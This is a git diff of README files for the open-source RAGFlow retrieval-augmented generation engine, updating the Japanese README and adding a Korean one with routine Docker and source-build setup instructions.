|
||||
$ cp ../docker/nginx/nginx.conf /etc/nginx
|
||||
$ cp ../docker/nginx/ragflow.conf /etc/nginx/conf.d
|
||||
$ systemctl start nginx
|
||||
```
|
||||
|
||||
## 📚 Documentation
|
||||
|
||||
- [Quickstart](https://ragflow.io/docs/dev/)
|
||||
- [User guide](https://ragflow.io/docs/dev/category/user-guides)
|
||||
- [References](https://ragflow.io/docs/dev/category/references)
|
||||
- [FAQ](https://ragflow.io/docs/dev/faq)
|
||||
|
||||
## 📜 Roadmap
|
||||
|
||||
See the [RAGFlow Roadmap 2024](https://github.com/infiniflow/ragflow/issues/162)
|
||||
|
||||
## 🏄 Community
|
||||
|
||||
- [Discord](https://discord.gg/4XxujFgUN7)
|
||||
- [Twitter](https://twitter.com/infiniflowai)
|
||||
- [GitHub Discussions](https://github.com/orgs/infiniflow/discussions)
|
||||
|
||||
## 🙌 Contributing
|
||||
|
||||
RAGFlow flourishes via open-source collaboration. In this spirit, we embrace diverse contributions from the community. If you would like to be a part, review our [Contribution Guidelines](./docs/references/CONTRIBUTING.md) first.
|
||||
|
||||
560
README_ja.md
560
README_ja.md
@ -1,271 +1,289 @@
|
||||
<div align="center">
|
||||
<a href="https://demo.ragflow.io/">
|
||||
<img src="web/src/assets/logo-with-text.png" width="350" alt="ragflow logo">
|
||||
</a>
|
||||
</div>
|
||||
|
||||
<p align="center">
|
||||
<a href="./README.md">English</a> |
|
||||
<a href="./README_zh.md">简体中文</a> |
|
||||
<a href="./README_ja.md">日本語</a>
|
||||
</p>
|
||||
|
||||
<p align="center">
|
||||
<a href="https://github.com/infiniflow/ragflow/releases/latest">
|
||||
<img src="https://img.shields.io/github/v/release/infiniflow/ragflow?color=blue&label=Latest%20Release" alt="Latest Release">
|
||||
</a>
|
||||
<a href="https://demo.ragflow.io" target="_blank">
|
||||
<img alt="Static Badge" src="https://img.shields.io/badge/Online-Demo-4e6b99"></a>
|
||||
<a href="https://hub.docker.com/r/infiniflow/ragflow" target="_blank">
|
||||
<img src="https://img.shields.io/badge/docker_pull-ragflow:v0.6.0-brightgreen"
|
||||
alt="docker pull infiniflow/ragflow:v0.6.0"></a>
|
||||
<a href="https://github.com/infiniflow/ragflow/blob/main/LICENSE">
|
||||
<img height="21" src="https://img.shields.io/badge/License-Apache--2.0-ffffff?style=flat-square&labelColor=d4eaf7&color=1570EF" alt="license">
|
||||
</a>
|
||||
</p>
|
||||
|
||||
## 💡 RAGFlow とは?
|
||||
|
||||
[RAGFlow](https://ragflow.io/) は、深い文書理解に基づいたオープンソースの RAG (Retrieval-Augmented Generation) エンジンである。LLM(大規模言語モデル)を組み合わせることで、様々な複雑なフォーマットのデータから根拠のある引用に裏打ちされた、信頼できる質問応答機能を実現し、あらゆる規模のビジネスに適した RAG ワークフローを提供します。
|
||||
|
||||
## 📌 最新情報
|
||||
|
||||
- 2024-05-21 ストリーミング出力とテキストチャンク取得APIをサポート。
|
||||
- 2024-05-15 OpenAI GPT-4oを統合しました。
|
||||
- 2024-05-08 LLM DeepSeek-V2を統合しました。
|
||||
- 2024-04-26 「ファイル管理」機能を追加しました。
|
||||
- 2024-04-19 会話 API をサポートします ([詳細](./docs/conversation_api.md))。
|
||||
- 2024-04-16 [BCEmbedding](https://github.com/netease-youdao/BCEmbedding) から埋め込みモデル「bce-embedding-base_v1」を追加します。
|
||||
- 2024-04-16 [FastEmbed](https://github.com/qdrant/fastembed) は、軽量かつ高速な埋め込み用に設計されています。
|
||||
- 2024-04-11 ローカル LLM デプロイメント用に [Xinference](./docs/xinference.md) をサポートします。
|
||||
- 2024-04-10 メソッド「Laws」に新しいレイアウト認識モデルを追加します。
|
||||
- 2024-04-08 [Ollama](./docs/ollama.md) を使用した大規模モデルのローカライズされたデプロイメントをサポートします。
|
||||
- 2024-04-07 中国語インターフェースをサポートします。
|
||||
|
||||
|
||||
## 🌟 主な特徴
|
||||
|
||||
### 🍭 **"Quality in, quality out"**
|
||||
|
||||
- 複雑な形式の非構造化データからの[深い文書理解](./deepdoc/README.md)ベースの知識抽出。
|
||||
- 無限のトークンから"干し草の山の中の針"を見つける。
|
||||
|
||||
### 🍱 **テンプレートベースのチャンク化**
|
||||
|
||||
- 知的で解釈しやすい。
|
||||
- テンプレートオプションが豊富。
|
||||
|
||||
### 🌱 **ハルシネーションが軽減された根拠のある引用**
|
||||
|
||||
- 可視化されたテキストチャンキング(text chunking)で人間の介入を可能にする。
|
||||
- 重要な参考文献のクイックビューと、追跡可能な引用によって根拠ある答えをサポートする。
|
||||
|
||||
### 🍔 **多様なデータソースとの互換性**
|
||||
|
||||
- Word、スライド、Excel、txt、画像、スキャンコピー、構造化データ、Web ページなどをサポート。
|
||||
|
||||
### 🛀 **自動化された楽な RAG ワークフロー**
|
||||
|
||||
- 個人から大企業まで対応できる RAG オーケストレーション(orchestration)。
|
||||
- カスタマイズ可能な LLM とエンベッディングモデル。
|
||||
- 複数の想起と融合された再ランク付け。
|
||||
- 直感的な API によってビジネスとの統合がシームレスに。
|
||||
|
||||
## 🔎 システム構成
|
||||
|
||||
<div align="center" style="margin-top:20px;margin-bottom:20px;">
|
||||
<img src="https://github.com/infiniflow/ragflow/assets/12318111/d6ac5664-c237-4200-a7c2-a4a00691b485" width="1000"/>
|
||||
</div>
|
||||
|
||||
## 🎬 初期設定
|
||||
|
||||
### 📝 必要条件
|
||||
|
||||
- CPU >= 4 cores
|
||||
- RAM >= 16 GB
|
||||
- Disk >= 50 GB
|
||||
- Docker >= 24.0.0 & Docker Compose >= v2.26.1
|
||||
> ローカルマシン(Windows、Mac、または Linux)に Docker をインストールしていない場合は、[Docker Engine のインストール](https://docs.docker.com/engine/install/) を参照してください。
|
||||
|
||||
### 🚀 サーバーを起動
|
||||
|
||||
1. `vm.max_map_count` >= 262144 であることを確認する【[もっと](./docs/max_map_count.md)】:
|
||||
|
||||
> `vm.max_map_count` の値をチェックするには:
|
||||
>
|
||||
> ```bash
|
||||
> $ sysctl vm.max_map_count
|
||||
> ```
|
||||
>
|
||||
> `vm.max_map_count` が 262144 より大きい値でなければリセットする。
|
||||
>
|
||||
> ```bash
|
||||
> # In this case, we set it to 262144:
|
||||
> $ sudo sysctl -w vm.max_map_count=262144
|
||||
> ```
|
||||
>
|
||||
> この変更はシステム再起動後にリセットされる。変更を恒久的なものにするには、**/etc/sysctl.conf** の `vm.max_map_count` 値を適宜追加または更新する:
|
||||
>
|
||||
> ```bash
|
||||
> vm.max_map_count=262144
|
||||
> ```
|
||||
|
||||
2. リポジトリをクローンする:
|
||||
|
||||
```bash
|
||||
$ git clone https://github.com/infiniflow/ragflow.git
|
||||
```
|
||||
|
||||
3. ビルド済みの Docker イメージをビルドし、サーバーを起動する:
|
||||
|
||||
```bash
|
||||
$ cd ragflow/docker
|
||||
$ chmod +x ./entrypoint.sh
|
||||
$ docker compose up -d
|
||||
```
|
||||
|
||||
> 上記のコマンドを実行すると、RAGFlowの開発版dockerイメージが自動的にダウンロードされます。 特定のバージョンのDockerイメージをダウンロードして実行したい場合は、docker/.envファイルのRAGFLOW_VERSION変数を見つけて、対応するバージョンに変更してください。 例えば、RAGFLOW_VERSION=v0.6.0として、上記のコマンドを実行してください。
|
||||
|
||||
> コアイメージのサイズは約 9 GB で、ロードに時間がかかる場合があります。
|
||||
|
||||
4. サーバーを立ち上げた後、サーバーの状態を確認する:
|
||||
|
||||
```bash
|
||||
$ docker logs -f ragflow-server
|
||||
```
|
||||
|
||||
_以下の出力は、システムが正常に起動したことを確認するものです:_
|
||||
|
||||
```bash
|
||||
____ ______ __
|
||||
/ __ \ ____ _ ____ _ / ____// /____ _ __
|
||||
/ /_/ // __ `// __ `// /_ / // __ \| | /| / /
|
||||
/ _, _// /_/ // /_/ // __/ / // /_/ /| |/ |/ /
|
||||
/_/ |_| \__,_/ \__, //_/ /_/ \____/ |__/|__/
|
||||
/____/
|
||||
|
||||
* Running on all addresses (0.0.0.0)
|
||||
* Running on http://127.0.0.1:9380
|
||||
* Running on http://x.x.x.x:9380
|
||||
INFO:werkzeug:Press CTRL+C to quit
|
||||
```
|
||||
> もし確認ステップをスキップして直接 RAGFlow にログインした場合、その時点で RAGFlow が完全に初期化されていない可能性があるため、ブラウザーがネットワーク異常エラーを表示するかもしれません。
|
||||
|
||||
5. ウェブブラウザで、プロンプトに従ってサーバーの IP アドレスを入力し、RAGFlow にログインします。
|
||||
> デフォルトの設定を使用する場合、デフォルトの HTTP サービングポート `80` は省略できるので、与えられたシナリオでは、`http://IP_OF_YOUR_MACHINE`(ポート番号は省略)だけを入力すればよい。
|
||||
6. [service_conf.yaml](./docker/service_conf.yaml) で、`user_default_llm` で希望の LLM ファクトリを選択し、`API_KEY` フィールドを対応する API キーで更新する。
|
||||
|
||||
> 詳しくは [./docs/llm_api_key_setup.md](./docs/llm_api_key_setup.md) を参照してください。
|
||||
|
||||
_これで初期設定完了!ショーの開幕です!_
|
||||
|
||||
## 🔧 コンフィグ
|
||||
|
||||
システムコンフィグに関しては、以下のファイルを管理する必要がある:
|
||||
|
||||
- [.env](./docker/.env): `SVR_HTTP_PORT`、`MYSQL_PASSWORD`、`MINIO_PASSWORD` などのシステムの基本設定を保持する。
|
||||
- [service_conf.yaml](./docker/service_conf.yaml): バックエンドのサービスを設定します。
|
||||
- [docker-compose.yml](./docker/docker-compose.yml): システムの起動は [docker-compose.yml](./docker/docker-compose.yml) に依存している。
|
||||
|
||||
[.env](./docker/.env) ファイルの変更が [service_conf.yaml](./docker/service_conf.yaml) ファイルの内容と一致していることを確認する必要があります。
|
||||
|
||||
> [./docker/README](./docker/README.md) ファイルは環境設定とサービスコンフィグの詳細な説明を提供し、[./docker/README](./docker/README.md) ファイルに記載されている全ての環境設定が [service_conf.yaml](./docker/service_conf.yaml) ファイルの対応するコンフィグと一致していることを確認することが義務付けられています。
|
||||
|
||||
デフォルトの HTTP サービングポート(80)を更新するには、[docker-compose.yml](./docker/docker-compose.yml) にアクセスして、`80:80` を `<YOUR_SERVING_PORT>:80` に変更します。
|
||||
|
||||
> すべてのシステム設定のアップデートを有効にするには、システムの再起動が必要です:
|
||||
>
|
||||
> ```bash
|
||||
> $ docker-compose up -d
|
||||
> ```
|
||||
|
||||
## 🛠️ ソースからビルドする
|
||||
|
||||
ソースからDockerイメージをビルドするには:
|
||||
|
||||
```bash
|
||||
$ git clone https://github.com/infiniflow/ragflow.git
|
||||
$ cd ragflow/
|
||||
$ docker build -t infiniflow/ragflow:v0.6.0 .
|
||||
$ cd ragflow/docker
|
||||
$ chmod +x ./entrypoint.sh
|
||||
$ docker compose up -d
|
||||
```
|
||||
|
||||
## 🛠️ ソースコードからサービスを起動する方法
|
||||
|
||||
ソースコードからサービスを起動する場合は、以下の手順に従ってください:
|
||||
|
||||
1. リポジトリをクローンします
|
||||
```bash
|
||||
$ git clone https://github.com/infiniflow/ragflow.git
|
||||
$ cd ragflow/
|
||||
```
|
||||
|
||||
2. 仮想環境を作成します(AnacondaまたはMinicondaがインストールされていることを確認してください)
|
||||
```bash
|
||||
$ conda create -n ragflow python=3.11.0
|
||||
$ conda activate ragflow
|
||||
$ pip install -r requirements.txt
|
||||
```
|
||||
CUDAのバージョンが12.0以上の場合、以下の追加コマンドを実行してください:
|
||||
```bash
|
||||
$ pip uninstall -y onnxruntime-gpu
|
||||
$ pip install onnxruntime-gpu --extra-index-url https://aiinfra.pkgs.visualstudio.com/PublicPackages/_packaging/onnxruntime-cuda-12/pypi/simple/
|
||||
```
|
||||
|
||||
3. エントリースクリプトをコピーし、環境変数を設定します
|
||||
```bash
|
||||
$ cp docker/entrypoint.sh .
|
||||
$ vi entrypoint.sh
|
||||
```
|
||||
以下のコマンドでPythonのパスとragflowプロジェクトのパスを取得します:
|
||||
```bash
|
||||
$ which python
|
||||
$ pwd
|
||||
```
|
||||
|
||||
`which python`の出力を`PY`の値として、`pwd`の出力を`PYTHONPATH`の値として設定します。
|
||||
|
||||
`LD_LIBRARY_PATH`が既に設定されている場合は、コメントアウトできます。
|
||||
|
||||
```bash
|
||||
# 実際の状況に応じて設定を調整してください。以下の二つのexportは新たに追加された設定です
|
||||
PY=${PY}
|
||||
export PYTHONPATH=${PYTHONPATH}
|
||||
# オプション:Hugging Faceミラーを追加
|
||||
export HF_ENDPOINT=https://hf-mirror.com
|
||||
```
|
||||
|
||||
4. 基本サービスを起動します
|
||||
```bash
|
||||
$ cd docker
|
||||
$ docker compose -f docker-compose-base.yml up -d
|
||||
```
|
||||
|
||||
5. 設定ファイルを確認します
|
||||
**docker/.env**内の設定が**conf/service_conf.yaml**内の設定と一致していることを確認してください。**service_conf.yaml**内の関連サービスのIPアドレスとポートは、ローカルマシンのIPアドレスとコンテナが公開するポートに変更する必要があります。
|
||||
|
||||
6. サービスを起動します
|
||||
```bash
|
||||
$ chmod +x ./entrypoint.sh
|
||||
$ bash ./entrypoint.sh
|
||||
```
|
||||
|
||||
## 📚 ドキュメンテーション
|
||||
|
||||
- [Quickstart](./docs/quickstart.md)
|
||||
- [FAQ](./docs/faq.md)
|
||||
|
||||
## 📜 ロードマップ
|
||||
|
||||
[RAGFlow ロードマップ 2024](https://github.com/infiniflow/ragflow/issues/162) を参照
|
||||
|
||||
## 🏄 コミュニティ
|
||||
|
||||
- [Discord](https://discord.gg/4XxujFgUN7)
|
||||
- [Twitter](https://twitter.com/infiniflowai)
|
||||
|
||||
## 🙌 コントリビュート
|
||||
|
||||
RAGFlow はオープンソースのコラボレーションによって発展してきました。この精神に基づき、私たちはコミュニティからの多様なコントリビュートを受け入れています。 参加を希望される方は、まず[コントリビューションガイド](https://github.com/infiniflow/ragflow/blob/main/docs/CONTRIBUTING.md)をご覧ください。
|
||||
<div align="center">
|
||||
<a href="https://demo.ragflow.io/">
|
||||
<img src="web/src/assets/logo-with-text.png" width="350" alt="ragflow logo">
|
||||
</a>
|
||||
</div>
|
||||
|
||||
<p align="center">
|
||||
<a href="./README.md">English</a> |
|
||||
<a href="./README_zh.md">简体中文</a> |
|
||||
<a href="./README_ja.md">日本語</a> |
|
||||
<a href="./README_ko.md">한국어</a>
|
||||
</p>
|
||||
|
||||
<p align="center">
|
||||
<a href="https://github.com/infiniflow/ragflow/releases/latest">
|
||||
<img src="https://img.shields.io/github/v/release/infiniflow/ragflow?color=blue&label=Latest%20Release" alt="Latest Release">
|
||||
</a>
|
||||
<a href="https://demo.ragflow.io" target="_blank">
|
||||
<img alt="Static Badge" src="https://img.shields.io/badge/Online-Demo-4e6b99"></a>
|
||||
<a href="https://hub.docker.com/r/infiniflow/ragflow" target="_blank">
|
||||
<img src="https://img.shields.io/badge/docker_pull-ragflow:v0.11.0-brightgreen"
|
||||
alt="docker pull infiniflow/ragflow:v0.11.0"></a>
|
||||
<a href="https://github.com/infiniflow/ragflow/blob/main/LICENSE">
|
||||
<img height="21" src="https://img.shields.io/badge/License-Apache--2.0-ffffff?labelColor=d4eaf7&color=2e6cc4" alt="license">
|
||||
</a>
|
||||
</p>
|
||||
|
||||
<h4 align="center">
|
||||
<a href="https://ragflow.io/docs/dev/">Document</a> |
|
||||
<a href="https://github.com/infiniflow/ragflow/issues/162">Roadmap</a> |
|
||||
<a href="https://twitter.com/infiniflowai">Twitter</a> |
|
||||
<a href="https://discord.gg/4XxujFgUN7">Discord</a> |
|
||||
<a href="https://demo.ragflow.io">Demo</a>
|
||||
</h4>
|
||||
|
||||
## 💡 RAGFlow とは?
|
||||
|
||||
[RAGFlow](https://ragflow.io/) は、深い文書理解に基づいたオープンソースの RAG (Retrieval-Augmented Generation) エンジンである。LLM(大規模言語モデル)を組み合わせることで、様々な複雑なフォーマットのデータから根拠のある引用に裏打ちされた、信頼できる質問応答機能を実現し、あらゆる規模のビジネスに適した RAG ワークフローを提供します。
|
||||
|
||||
## 🎮 Demo
|
||||
|
||||
デモをお試しください:[https://demo.ragflow.io](https://demo.ragflow.io)。
|
||||
<div align="center" style="margin-top:20px;margin-bottom:20px;">
|
||||
<img src="https://github.com/infiniflow/ragflow/assets/7248/2f6baa3e-1092-4f11-866d-36f6a9d075e5" width="1200"/>
|
||||
<img src="https://github.com/infiniflow/ragflow/assets/12318111/b083d173-dadc-4ea9-bdeb-180d7df514eb" width="1200"/>
|
||||
</div>
|
||||
|
||||
|
||||
## 🔥 最新情報
|
||||
|
||||
- 2024-09-13 ナレッジベース Q&A の検索モードを追加しました。
|
||||
- 2024-09-09 エージェントに医療相談テンプレートを追加しました。
|
||||
- 2024-08-22 RAG を介して SQL ステートメントへのテキストをサポートします。
|
||||
- 2024-08-02 [graphrag](https://github.com/microsoft/graphrag) からインスピレーションを得た GraphRAG とマインド マップをサポートします。
|
||||
- 2024-07-23 音声ファイルの解析をサポートしました。
|
||||
- 2024-07-08 [Graph](./agent/README.md) ベースのワークフローをサポート
|
||||
- 2024-06-27 Q&A 解析メソッドで Markdown と Docx をサポートし、Docx ファイルから画像を抽出し、Markdown ファイルからテーブルを抽出します。
|
||||
- 2024-05-23 より良いテキスト検索のために [RAPTOR](https://arxiv.org/html/2401.18059v1) をサポート。
|
||||
|
||||
|
||||
## 🌟 主な特徴
|
||||
|
||||
### 🍭 **"Quality in, quality out"**
|
||||
|
||||
- 複雑な形式の非構造化データからの[深い文書理解](./deepdoc/README.md)ベースの知識抽出。
|
||||
- 無限のトークンから"干し草の山の中の針"を見つける。
|
||||
|
||||
### 🍱 **テンプレートベースのチャンク化**
|
||||
|
||||
- 知的で解釈しやすい。
|
||||
- テンプレートオプションが豊富。
|
||||
|
||||
### 🌱 **ハルシネーションが軽減された根拠のある引用**
|
||||
|
||||
- 可視化されたテキストチャンキング(text chunking)で人間の介入を可能にする。
|
||||
- 重要な参考文献のクイックビューと、追跡可能な引用によって根拠ある答えをサポートする。
|
||||
|
||||
### 🍔 **多様なデータソースとの互換性**
|
||||
|
||||
- Word、スライド、Excel、txt、画像、スキャンコピー、構造化データ、Web ページなどをサポート。
|
||||
|
||||
### 🛀 **自動化された楽な RAG ワークフロー**
|
||||
|
||||
- 個人から大企業まで対応できる RAG オーケストレーション(orchestration)。
|
||||
- カスタマイズ可能な LLM とエンベッディングモデル。
|
||||
- 複数の想起と融合された再ランク付け。
|
||||
- 直感的な API によってビジネスとの統合がシームレスに。
|
||||
|
||||
## 🔎 システム構成
|
||||
|
||||
<div align="center" style="margin-top:20px;margin-bottom:20px;">
|
||||
<img src="https://github.com/infiniflow/ragflow/assets/12318111/d6ac5664-c237-4200-a7c2-a4a00691b485" width="1000"/>
|
||||
</div>
|
||||
|
||||
## 🎬 初期設定
|
||||
|
||||
### 📝 必要条件
|
||||
|
||||
- CPU >= 4 cores
|
||||
- RAM >= 16 GB
|
||||
- Disk >= 50 GB
|
||||
- Docker >= 24.0.0 & Docker Compose >= v2.26.1
|
||||
> ローカルマシン(Windows、Mac、または Linux)に Docker をインストールしていない場合は、[Docker Engine のインストール](https://docs.docker.com/engine/install/) を参照してください。
|
||||
|
||||
### 🚀 サーバーを起動
|
||||
|
||||
1. `vm.max_map_count` >= 262144 であることを確認する:
|
||||
|
||||
> `vm.max_map_count` の値をチェックするには:
|
||||
>
|
||||
> ```bash
|
||||
> $ sysctl vm.max_map_count
|
||||
> ```
|
||||
>
|
||||
> `vm.max_map_count` が 262144 より大きい値でなければリセットする。
|
||||
>
|
||||
> ```bash
|
||||
> # In this case, we set it to 262144:
|
||||
> $ sudo sysctl -w vm.max_map_count=262144
|
||||
> ```
|
||||
>
|
||||
> この変更はシステム再起動後にリセットされる。変更を恒久的なものにするには、**/etc/sysctl.conf** の `vm.max_map_count` 値を適宜追加または更新する:
|
||||
>
|
||||
> ```bash
|
||||
> vm.max_map_count=262144
|
||||
> ```
|
||||
|
||||
2. リポジトリをクローンする:
|
||||
|
||||
```bash
|
||||
$ git clone https://github.com/infiniflow/ragflow.git
|
||||
```
|
||||
|
||||
3. ビルド済みの Docker イメージをビルドし、サーバーを起動する:
|
||||
|
||||
```bash
|
||||
$ cd ragflow/docker
|
||||
$ chmod +x ./entrypoint.sh
|
||||
$ docker compose up -d
|
||||
```
|
||||
|
||||
> 上記のコマンドを実行すると、RAGFlowの開発版dockerイメージが自動的にダウンロードされます。 特定のバージョンのDockerイメージをダウンロードして実行したい場合は、docker/.envファイルのRAGFLOW_VERSION変数を見つけて、対応するバージョンに変更してください。 例えば、RAGFLOW_VERSION=v0.11.0として、上記のコマンドを実行してください。
|
||||
|
||||
> コアイメージのサイズは約 9 GB で、ロードに時間がかかる場合があります。
|
||||
|
||||
4. サーバーを立ち上げた後、サーバーの状態を確認する:
|
||||
|
||||
```bash
|
||||
$ docker logs -f ragflow-server
|
||||
```
|
||||
|
||||
_以下の出力は、システムが正常に起動したことを確認するものです:_
|
||||
|
||||
```bash
|
||||
____ ______ __
|
||||
/ __ \ ____ _ ____ _ / ____// /____ _ __
|
||||
/ /_/ // __ `// __ `// /_ / // __ \| | /| / /
|
||||
/ _, _// /_/ // /_/ // __/ / // /_/ /| |/ |/ /
|
||||
/_/ |_| \__,_/ \__, //_/ /_/ \____/ |__/|__/
|
||||
/____/
|
||||
|
||||
* Running on all addresses (0.0.0.0)
|
||||
* Running on http://127.0.0.1:9380
|
||||
* Running on http://x.x.x.x:9380
|
||||
INFO:werkzeug:Press CTRL+C to quit
|
||||
```
|
||||
> もし確認ステップをスキップして直接 RAGFlow にログインした場合、その時点で RAGFlow が完全に初期化されていない可能性があるため、ブラウザーがネットワーク異常エラーを表示するかもしれません。
|
||||
|
||||
5. ウェブブラウザで、プロンプトに従ってサーバーの IP アドレスを入力し、RAGFlow にログインします。
|
||||
> デフォルトの設定を使用する場合、デフォルトの HTTP サービングポート `80` は省略できるので、与えられたシナリオでは、`http://IP_OF_YOUR_MACHINE`(ポート番号は省略)だけを入力すればよい。
|
||||
6. [service_conf.yaml](./docker/service_conf.yaml) で、`user_default_llm` で希望の LLM ファクトリを選択し、`API_KEY` フィールドを対応する API キーで更新する。
|
||||
|
||||
> 詳しくは [llm_api_key_setup](https://ragflow.io/docs/dev/llm_api_key_setup) を参照してください。
|
||||
|
||||
_これで初期設定完了!ショーの開幕です!_
|
||||
|
||||
## 🔧 コンフィグ
|
||||
|
||||
システムコンフィグに関しては、以下のファイルを管理する必要がある:
|
||||
|
||||
- [.env](./docker/.env): `SVR_HTTP_PORT`、`MYSQL_PASSWORD`、`MINIO_PASSWORD` などのシステムの基本設定を保持する。
|
||||
- [service_conf.yaml](./docker/service_conf.yaml): バックエンドのサービスを設定します。
|
||||
- [docker-compose.yml](./docker/docker-compose.yml): システムの起動は [docker-compose.yml](./docker/docker-compose.yml) に依存している。
|
||||
|
||||
[.env](./docker/.env) ファイルの変更が [service_conf.yaml](./docker/service_conf.yaml) ファイルの内容と一致していることを確認する必要があります。
|
||||
|
||||
> [./docker/README](./docker/README.md) ファイルは環境設定とサービスコンフィグの詳細な説明を提供し、[./docker/README](./docker/README.md) ファイルに記載されている全ての環境設定が [service_conf.yaml](./docker/service_conf.yaml) ファイルの対応するコンフィグと一致していることを確認することが義務付けられています。
|
||||
|
||||
デフォルトの HTTP サービングポート(80)を更新するには、[docker-compose.yml](./docker/docker-compose.yml) にアクセスして、`80:80` を `<YOUR_SERVING_PORT>:80` に変更します。
|
||||
|
||||
> すべてのシステム設定のアップデートを有効にするには、システムの再起動が必要です:
|
||||
>
|
||||
> ```bash
|
||||
> $ docker-compose up -d
|
||||
> ```
|
||||
|
||||
## 🛠️ ソースからビルドする
|
||||
|
||||
ソースからDockerイメージをビルドするには:
|
||||
|
||||
```bash
|
||||
$ git clone https://github.com/infiniflow/ragflow.git
|
||||
$ cd ragflow/
|
||||
$ docker build -t infiniflow/ragflow:v0.11.0 .
|
||||
$ cd ragflow/docker
|
||||
$ chmod +x ./entrypoint.sh
|
||||
$ docker compose up -d
|
||||
```
|
||||
|
||||
## 🛠️ ソースコードからサービスを起動する方法
|
||||
|
||||
ソースコードからサービスを起動する場合は、以下の手順に従ってください:
|
||||
|
||||
1. リポジトリをクローンします
|
||||
```bash
|
||||
$ git clone https://github.com/infiniflow/ragflow.git
|
||||
$ cd ragflow/
|
||||
```
|
||||
|
||||
2. 仮想環境を作成します(AnacondaまたはMinicondaがインストールされていることを確認してください)
|
||||
```bash
|
||||
$ conda create -n ragflow python=3.11.0
|
||||
$ conda activate ragflow
|
||||
$ pip install -r requirements.txt
|
||||
```
|
||||
CUDAのバージョンが12.0以上の場合、以下の追加コマンドを実行してください:
|
||||
```bash
|
||||
$ pip uninstall -y onnxruntime-gpu
|
||||
$ pip install onnxruntime-gpu --extra-index-url https://aiinfra.pkgs.visualstudio.com/PublicPackages/_packaging/onnxruntime-cuda-12/pypi/simple/
|
||||
```
|
||||
|
||||
3. エントリースクリプトをコピーし、環境変数を設定します
|
||||
```bash
|
||||
$ cp docker/entrypoint.sh .
|
||||
$ vi entrypoint.sh
|
||||
```
|
||||
以下のコマンドで Python のパスとragflowプロジェクトのパスを取得します:
|
||||
```bash
|
||||
$ which python
|
||||
$ pwd
|
||||
```
|
||||
|
||||
`which python` の出力を `PY` の値として、`pwd` の出力を `PYTHONPATH` の値として設定します。
|
||||
|
||||
`LD_LIBRARY_PATH` が既に設定されている場合は、コメントアウトできます。
|
||||
|
||||
```bash
|
||||
# 実際の状況に応じて設定を調整してください。以下の二つの export は新たに追加された設定です
|
||||
PY=${PY}
|
||||
export PYTHONPATH=${PYTHONPATH}
|
||||
# オプション:Hugging Face ミラーを追加
|
||||
export HF_ENDPOINT=https://hf-mirror.com
|
||||
```
|
||||
|
||||
4. 基本サービスを起動します
|
||||
```bash
|
||||
$ cd docker
|
||||
$ docker compose -f docker-compose-base.yml up -d
|
||||
```
|
||||
|
||||
5. 設定ファイルを確認します
|
||||
**docker/.env** 内の設定が**conf/service_conf.yaml**内の設定と一致していることを確認してください。**service_conf.yaml**内の関連サービスのIPアドレスとポートは、ローカルマシンのIPアドレスとコンテナが公開するポートに変更する必要があります。
|
||||
|
||||
6. サービスを起動します
|
||||
```bash
|
||||
$ chmod +x ./entrypoint.sh
|
||||
$ bash ./entrypoint.sh
|
||||
```
|
||||
|
||||
## 📚 ドキュメンテーション
|
||||
|
||||
- [Quickstart](https://ragflow.io/docs/dev/)
|
||||
- [User guide](https://ragflow.io/docs/dev/category/user-guides)
|
||||
- [References](https://ragflow.io/docs/dev/category/references)
|
||||
- [FAQ](https://ragflow.io/docs/dev/faq)
|
||||
|
||||
## 📜 ロードマップ
|
||||
|
||||
[RAGFlow ロードマップ 2024](https://github.com/infiniflow/ragflow/issues/162) を参照
|
||||
|
||||
## 🏄 コミュニティ
|
||||
|
||||
- [Discord](https://discord.gg/4XxujFgUN7)
|
||||
- [Twitter](https://twitter.com/infiniflowai)
|
||||
- [GitHub Discussions](https://github.com/orgs/infiniflow/discussions)
|
||||
|
||||
## 🙌 コントリビュート
|
||||
|
||||
RAGFlow はオープンソースのコラボレーションによって発展してきました。この精神に基づき、私たちはコミュニティからの多様なコントリビュートを受け入れています。 参加を希望される方は、まず [コントリビューションガイド](./docs/references/CONTRIBUTING.md)をご覧ください。
|
||||
|
||||
325
README_ko.md
Normal file
325
README_ko.md
Normal file
@ -0,0 +1,325 @@
|
||||
<div align="center">
|
||||
<a href="https://demo.ragflow.io/">
|
||||
<img src="web/src/assets/logo-with-text.png" width="520" alt="ragflow logo">
|
||||
</a>
|
||||
</div>
|
||||
|
||||
<p align="center">
|
||||
<a href="./README.md">English</a> |
|
||||
<a href="./README_zh.md">简体中文</a> |
|
||||
<a href="./README_ja.md">日本語</a> |
|
||||
<a href="./README_ko.md">한국어</a> |
|
||||
</p>
|
||||
|
||||
<p align="center">
|
||||
<a href="https://github.com/infiniflow/ragflow/releases/latest">
|
||||
<img src="https://img.shields.io/github/v/release/infiniflow/ragflow?color=blue&label=Latest%20Release" alt="Latest Release">
|
||||
</a>
|
||||
<a href="https://demo.ragflow.io" target="_blank">
|
||||
<img alt="Static Badge" src="https://img.shields.io/badge/Online-Demo-4e6b99"></a>
|
||||
<a href="https://hub.docker.com/r/infiniflow/ragflow" target="_blank">
|
||||
<img src="https://img.shields.io/badge/docker_pull-ragflow:v0.11.0-brightgreen" alt="docker pull infiniflow/ragflow:v0.11.0"></a>
|
||||
<a href="https://github.com/infiniflow/ragflow/blob/main/LICENSE">
|
||||
<img height="21" src="https://img.shields.io/badge/License-Apache--2.0-ffffff?labelColor=d4eaf7&color=2e6cc4" alt="license">
|
||||
</a>
|
||||
</p>
|
||||
|
||||
<h4 align="center">
|
||||
<a href="https://ragflow.io/docs/dev/">Document</a> |
|
||||
<a href="https://github.com/infiniflow/ragflow/issues/162">Roadmap</a> |
|
||||
<a href="https://twitter.com/infiniflowai">Twitter</a> |
|
||||
<a href="https://discord.gg/4XxujFgUN7">Discord</a> |
|
||||
<a href="https://demo.ragflow.io">Demo</a>
|
||||
</h4>
|
||||
|
||||
|
||||
## 💡 RAGFlow란?
|
||||
|
||||
[RAGFlow](https://ragflow.io/)는 심층 문서 이해에 기반한 오픈소스 RAG (Retrieval-Augmented Generation) 엔진입니다. 이 엔진은 대규모 언어 모델(LLM)과 결합하여 정확한 질문 응답 기능을 제공하며, 다양한 복잡한 형식의 데이터에서 신뢰할 수 있는 출처를 바탕으로 한 인용을 통해 이를 뒷받침합니다. RAGFlow는 규모에 상관없이 모든 기업에 최적화된 RAG 워크플로우를 제공합니다.
|
||||
|
||||
|
||||
|
||||
## 🎮 데모
|
||||
데모를 [https://demo.ragflow.io](https://demo.ragflow.io)에서 실행해 보세요.
|
||||
<div align="center" style="margin-top:20px;margin-bottom:20px;">
|
||||
<img src="https://github.com/infiniflow/ragflow/assets/7248/2f6baa3e-1092-4f11-866d-36f6a9d075e5" width="1200"/>
|
||||
